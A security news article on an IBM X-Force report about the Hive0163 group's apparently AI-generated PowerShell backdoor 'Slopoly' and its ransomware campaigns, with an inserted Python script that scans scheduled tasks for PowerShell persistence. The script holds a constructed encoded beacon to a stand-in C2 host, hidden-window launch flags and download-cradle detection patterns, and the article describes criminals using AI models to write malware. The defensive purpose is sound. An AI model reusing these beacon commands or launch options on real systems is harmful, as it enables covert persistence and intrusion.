A financially motivated ransomware group is pioneering the use of artificial intelligence to create malware, marking a concerning evolution in cyberthreat tactics.
IBM X-Force researchers have identified that the threat actor Hive0163 deployed an AI-assisted malware called Slopoly during recent ransomware campaigns. The discovery represents one of the first documented cases of AI-generated malware being used operationally by cybercriminals.
"In early 2026, X-Force observed Hive0163 deploying a likely AI-generated malware dubbed 'Slopoly' during a ransomware attack, allowing the group to maintain persistent access to the server for more than a week," reads the report published by IBM. "Although still in the early stages, the adversarial use of AI is accelerating—and it's poised to significantly reshape the threat landscape, forcing defenders to fundamentally rethink today's security paradigms."
Hive0163 operates as a specialized post-compromise threat actor, utilizing multiple custom backdoors for maintaining long-term network access, data exfiltration, and ransomware deployment. Security researchers have linked the group to various malware developers and operators, including those behind Broomstick, Supper, PortStarter, SystemBC, and Rhysida ransomware variants.
Slopoly is a PowerShell backdoor that acts as a command-and-control (C2) client. It collects system information, sends heartbeat signals to remote servers, executes commands through cmd.exe, and establishes persistence via scheduled tasks.
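Because the persistence mechanism described here is a scheduled task that launches PowerShell, the defensive check that follows from it is to triage task definitions for PowerShell launches with suspicious options. The example below is added here and is not code from the IBM X-Force report or from any project: it parses the task XML that Windows records in Security event 4698 (the TaskContent field) or that `schtasks /Query /XML` exports, decodes any `-EncodedCommand` payload, and scores the launch. The heuristics, the sample events and the `c2.example.invalid` beacon are constructed assumptions for illustration, not indicators from the report.

```python
"""Triage scheduled-task definitions for PowerShell persistence (constructed example)."""
import base64
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Namespace Windows uses for task definitions (also seen in event 4698 TaskContent).
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
POWERSHELL_NAMES = {"powershell.exe", "powershell", "pwsh.exe", "pwsh"}

# Launch options and code patterns worth a closer look; heuristics are assumptions.
ARG_PATTERNS = [
    (re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s"), "encoded command"),
    (re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"), "hidden window"),
    (re.compile(r"(?i)-e(?:p|x|xec|xecutionpolicy)\s+(?:bypass|unrestricted)"), "execution policy bypass"),
    (re.compile(r"(?i)(?:downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient"
                r"|invoke-expression|\biex\b)"), "download or beacon cradle"),
    (re.compile(r"(?i)\\(?:appdata|temp|programdata|users\\public)\\"), "script in user-writable path"),
]
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")


def decode_encoded_command(arguments):
    """Return the script behind -EncodedCommand (base64 of UTF-16LE), or None."""
    match = ENCODED_FLAG.search(arguments)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def extract_exec_actions(task_xml):
    """Return (command, arguments) for every <Exec> action in a task definition."""
    root = ET.fromstring(task_xml)
    actions = []
    for exec_node in root.iterfind(".//t:Actions/t:Exec", TASK_NS):
        command = exec_node.findtext("t:Command", default="", namespaces=TASK_NS).strip()
        arguments = exec_node.findtext("t:Arguments", default="", namespaces=TASK_NS).strip()
        actions.append((command, arguments))
    return actions


def score_task(task_xml):
    """Collect the reasons a task looks like PowerShell persistence (empty list if none)."""
    reasons, decoded = [], None
    for command, arguments in extract_exec_actions(task_xml):
        binary = command.replace('"', "").split("\\")[-1].lower()
        if binary not in POWERSHELL_NAMES:
            continue  # only PowerShell launches are in scope here
        text = arguments
        decoded = decode_encoded_command(arguments)
        if decoded:
            text += " " + decoded  # scan the decoded script as well as the raw arguments
        for pattern, reason in ARG_PATTERNS:
            if pattern.search(text) and reason not in reasons:
                reasons.append(reason)
    return {"reasons": reasons, "decoded_command": decoded}


def triage(events):
    """Return one finding per event whose task launches PowerShell with suspicious options."""
    findings = []
    for event in events:
        result = score_task(event["TaskContent"])
        if result["reasons"]:
            findings.append({"task": event["TaskName"], "created_by": event["SubjectUserName"],
                             "reasons": result["reasons"], "decoded_command": result["decoded_command"]})
    return findings


def task_xml(command, arguments):
    """Build a minimal task definition in the Windows task schema (constructed sample data)."""
    return ('<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
            f'<Actions Context="Author"><Exec><Command>{escape(command)}</Command>'
            f"<Arguments>{escape(arguments)}</Arguments></Exec></Actions></Task>")


# Constructed stand-ins for the EventData fields of three 4698 events.
BEACON_SCRIPT = "Invoke-WebRequest -Uri http://c2.example.invalid/beacon"  # constructed, not real
ENCODED_BEACON = base64.b64encode(BEACON_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    {"TaskName": r"\Maintenance\RotateLogs", "SubjectUserName": "svc_backup",
     "TaskContent": task_xml(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                             r"-NoProfile -File C:\Scripts\rotate-logs.ps1")},
    {"TaskName": r"\OneDrive Update", "SubjectUserName": "jdoe",
     "TaskContent": task_xml("powershell.exe", f"-w hidden -ep bypass -enc {ENCODED_BEACON}")},
    {"TaskName": r"\Microsoft\Windows\Defrag\ScheduledDefrag", "SubjectUserName": "SYSTEM",
     "TaskContent": task_xml(r"%windir%\system32\defrag.exe", "-c -h")},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(f"{finding['task']} (created by {finding['created_by']}): {', '.join(finding['reasons'])}")
        if finding["decoded_command"]:
            print("  decoded -EncodedCommand:", finding["decoded_command"])
```

Run against the constructed events, only the second task is reported: the benign `-File` job and the non-PowerShell defrag task produce no reasons. In a SIEM the same scoring applies to the TaskContent field of 4698 events, and the decoded command is what an analyst reviews to tell a heartbeat or download cradle from a legitimate encoded script.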
What makes Slopoly particularly noteworthy is its structure and extensive code comments, which strongly indicate AI-assisted development. This suggests that cybercriminals are successfully leveraging large language models to accelerate malware creation processes.
Researchers traced one intrusion to a ClickFix attack that deceived victims into executing malicious PowerShell commands. This initial compromise deployed NodeSnake, which serves as the first stage of a comprehensive command-and-control framework extensively used by Hive0163.
"NodeSnake is the first stage of a larger malware command-and-control (C2) framework heavily used by a threat actor tracked by X-Force as Hive0163. According to our observations, the framework spans a number of client implementations of varying capabilities in PowerShell, PHP, C/C++, Java and JavaScript for both Windows and Linux," continues the report. "These components have widely been reported as 'InterlockRAT' (Fortinet, eSentire) but despite its name, the final ransomware payloads may not be limited to Interlock only."
Following the initial compromise, NodeSnake downloaded additional payloads, including the more sophisticated InterlockRAT. This malware provides reverse shell access, SOCKS5 tunneling, and remote command execution.
The attackers subsequently deployed Slopoly alongside legitimate tools such as AzCopy and Advanced IP Scanner to expand their network access and facilitate lateral movement within compromised environments.
The campaign also involved deploying Windows Interlock ransomware, a 64-bit executable that supports various operational parameters. The ransomware can encrypt specific directories or files, delete itself after execution, and run as a scheduled task; it uses AES-GCM encryption combined with RSA-protected session keys.
The implications of AI-assisted malware development extend far beyond this single campaign. As large language models become more advanced and accessible, they effectively lower the barrier to entry for malware creation, potentially enabling less skilled threat actors to develop sophisticated attack tools.
"Looking into the future, AI-generated malware is only the first stage in a new arms race between defenders and attackers. The second stage is the use of agentic AI, and AI-integrated malware, which allow models to make decisions during all phases of the attack chain or during development and testing of advanced C2 frameworks," concludes the report.
Security experts warn that the weaponization of AI could lead to the creation of ephemeral malware that is harder to detect and attribute to specific threat actors. This development represents a significant challenge for cybersecurity defenders who must now prepare for AI-enhanced threats.
The discovery of Slopoly suggests that cybercriminals are moving beyond traditional malware development methods and embracing AI as a force multiplier. Organizations should prepare for an increase in AI-generated threats and consider how this technological shift might impact their security strategies and detection capabilities.